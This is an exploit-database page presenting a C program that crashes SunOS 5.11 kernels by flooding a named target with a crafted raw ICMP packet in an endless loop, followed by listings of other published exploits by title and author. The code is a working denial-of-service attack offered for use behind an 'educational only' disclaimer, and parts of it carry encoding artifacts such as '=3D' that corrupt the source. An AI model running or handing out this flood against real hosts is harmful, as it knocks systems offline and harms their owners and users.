Search for hundreds of thousands of exploits

"SunOS 5.11 ICMP - Denial of Service"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

unix

Release date

Exploit published date

2017-01-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
/*
*  SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit
*
*  Todor Donev <todor.donev@gmail.com>
*  http://www.ethical-hacker.org/
*  https://www.facebook.com/ethicalhackerorg
*
*  Disclaimer:
*  This or previous programs is for Educational
*  purpose ONLY. Do not use it without permission.
*  The usual disclaimer applies, especially the
*  fact that Todor Donev is not liable for any
*  damages caused by direct or indirect use of the
*  information or functionality provided by these
*  programs. The author or any Internet provider
*  bears NO responsibility for content or misuse
*  of these programs or any derivatives thereof.
*  By using these programs you accept the fact
*  that any damage (dataloss, system crash,
*  system compromise, etc.) caused by the use
*  of these programs is not Todor Donev's
*  responsibility.
*
*  Use them at your own risk!
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
=20
unsigned char b00m[75] =3D
{
    0x45, 0xFF, 0x00, 0x4D, 0x0C,
    0x52, 0x00, 0x00, 0x7E, 0x01,
    0x0C, 0xF2, 0x85, 0x47, 0x21,
    0x07, 0xC0, 0xA8, 0x0E, 0x58,
    0x03, 0x01, 0xAE, 0x37, 0x6F,
    0x3B, 0x66, 0xA7, 0x60, 0xAA,
    0x76, 0xC1, 0xEC, 0xA7, 0x7D,
    0xFA, 0x8A, 0x72, 0x8E, 0xC6,
    0xE3, 0xD2, 0x64, 0x13, 0xE7,
    0x4D, 0xBC, 0x01, 0x40, 0x5B,
    0x8E, 0x8B, 0xE5, 0xEE, 0x5E,
    0x37, 0xDD, 0xC2, 0x54, 0x8E,
    0x8D, 0xCE, 0x0C, 0x42, 0x97,
    0xA1, 0x8C, 0x04, 0x8A, 0xC2,=20
    0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
} ;
=20
    long   resolve(char *target){
    struct hostent *tgt;
    long   addr;
=20
    tgt =3D gethostbyname(target);
if (tgt =3D=3D NULL)
  return(-1);
    memcpy(&addr,tgt->h_addr,tgt->h_length);
    memcpy(b00m+16,&addr,sizeof(long));
  return(addr);
}
int main(int argc, char *argv[]){
    struct  sockaddr_in dst;
    long    saddr, daddr;
    int     s0cket;
    printf("[ SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit\n");
    printf("[ Todor Donev <todor.donev@gmail.com> www.ethical-hacker.org\n"=
);
  if (argc < 2){
    printf("[ Usage: %s <target>\n", *argv);
    return(1);
  }
  daddr   =3D resolve(argv[1]);
  saddr   =3D INADDR_ANY;
  memcpy(b00m+16, &daddr, sizeof(long));
  dst.sin_addr.s_addr   =3D daddr;
  dst.sin_family        =3D AF_INET;
  s0cket                =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s0cket =3D=3D -1)
    return(1);
    printf("[ ICMP Attacking: %s\n", argv[1]);
  while(1){
    if (sendto(s0cket,&b00m,75,0,(struct sockaddr *)&dst,sizeof(struct sock=
addr_in)) =3D=3D -1){
         perror("[ Error");
         exit(-1);
    }
  }
}
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2019-10-08"Zabbix 4.4 - Authentication Bypass"webappsphp"Todor Donev"
2019-09-23"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure"remotehardware"Todor Donev"
2019-09-09"WordPress 5.2.3 - Cross-Site Host Modification"webappsphp"Todor Donev"
2019-09-02"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection"remotehardware"Todor Donev"
2019-09-02"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"remotehardware"Todor Donev"
2019-05-24"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"webappsphp"Todor Donev"
2018-07-11"Awk to Perl 1.007-5 - Buffer Overflow (PoC)"locallinux"Todor Donev"
2018-06-22"Opencart < 3.0.2.0 - Denial of Service"dosphp"Todor Donev"
2018-04-02"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change"webappshardware"Todor Donev"
2018-03-30"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change"webappsasp"Todor Donev"
2018-03-30"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)"webappsasp"Todor Donev"
2018-03-28"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change"webappshardware"Todor Donev"
2018-01-17"D-Link DSL-2640R - DNS Change"webappshardware"Todor Donev"
2017-06-18"D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change"webappshardware"Todor Donev"
2017-06-17"UTstarcom WA3002G4 - DNS Change"webappshardware"Todor Donev"
2017-06-17"D-Link DSL-2640U - DNS Change"webappshardware"Todor Donev"
2017-06-17"Beetel BCM96338 Router - DNS Change"webappshardware"Todor Donev"
2017-06-16"iBall Baton iB-WRA150N - DNS Change"webappshardware"Todor Donev"
2017-01-22"SunOS 5.11 ICMP - Denial of Service"dosunix"Todor Donev"
2017-01-19"Tenda ADSL2/2+ Modem D820R - DNS Change"webappshardware"Todor Donev"
2017-01-19"Pirelli DRG A115 v3 ADSL Router - DNS Change"webappshardware"Todor Donev"
2017-01-16"Tenda ADSL2/2+ Modem D840R - DNS Change"webappshardware"Todor Donev"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/41142/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.